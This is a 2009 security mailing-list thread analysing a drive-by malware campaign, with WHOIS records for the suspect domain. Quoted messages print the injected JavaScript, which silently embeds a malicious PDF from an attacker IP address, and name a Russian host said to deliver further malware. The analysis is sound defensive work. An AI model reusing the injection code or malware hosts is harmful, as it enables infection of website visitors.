Paul, I noticed that in the PDF file but as the domain doesn't seem to have resolution I didn't mention it.
Jake WHOIS information on the domain Whois Record domain: TEST1.RU type: CORPORATE nserver: ns1.centerhost.ru. nserver: ns1.cetis.ru. state: REGISTERED, DELEGATED org: Center of Effective Technologies and Systems CETIS phone: +7 4957711654 fax-no: +7 4957879251 e-mail: <http://www.domaintools.com/registrant-search/?email=f6261250d87c80094b7a5eb64d324e5a> e-mail: <http://www.domaintools.com/registrant-search/?email=acac76ec2f649d85219bdf7879b125ff> registrar: REGRU-REG-RIPN created: 2001.03.30 paid-till: 2010.04.03 source: TC-RIPN Registry Data Created: 2001-03-30 Expires: 2010-04-03 Whois Server: whois.ripn.net Server Data Domain Status: Registered And No Website On Fri, Apr 17, 2009 at 9:06 PM, Paul Ferguson <fergdawgs...@gmail.com>wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securin...@gmail.com> > wrote: > > > >> I took a quick look at the code... formatted it in a pastebin here: > >> http://pastebin.com/m7b50be54 > >> > >> That javascript writes this to the page (URL obscured): > >> document.write("<embed > >> src=\"hXXp:// > 77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|<http://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown%7C> > >> U nknown|US|1.2.3.4\" width=\"0\" height=\"0\" > >> type=\"application/pdf\"></embed>"); > >> > >> The 1.2.3.4 in the URL is my public IP address (I changed that). > >> > >> Below the javascript, it grabs a PDF: > >> <embed src="include/two.pdf" width="1" height="0" > >> style="border:none"></embed> > >> > >> That PDF is on the site, I haven't looked at it yet though. > >> > > Not only is that .pdf malicious, when "executed" it also fetches additional > malware from: > > hxxp:// test1.ru /1.1.1/load.php > > If that host is not in your block list, it should be -- known purveyor of > crimeware. > > This is in addition to the other malicious URLs mentioned in this thread. > > - - ferg > > -----BEGIN PGP SIGNATURE----- > Version: PGP Desktop 9.5.3 (Build 5003) > > wj8DBQFJ6Seaq1pz9mNUZTMRAsePAJ4ltJybvyViJoiTJDbIN9JCMjbZtgCgtOnI > mxM8Ci/feKnJe6M6qbiESPw= > =b0Yj > -----END PGP SIGNATURE----- > > > > -- > "Fergie", a.k.a. Paul Ferguson > Engineering Architecture for the Internet > fergdawgster(at)gmail.com > ferg's tech blog: http://fergdawg.blogspot.com/ > >
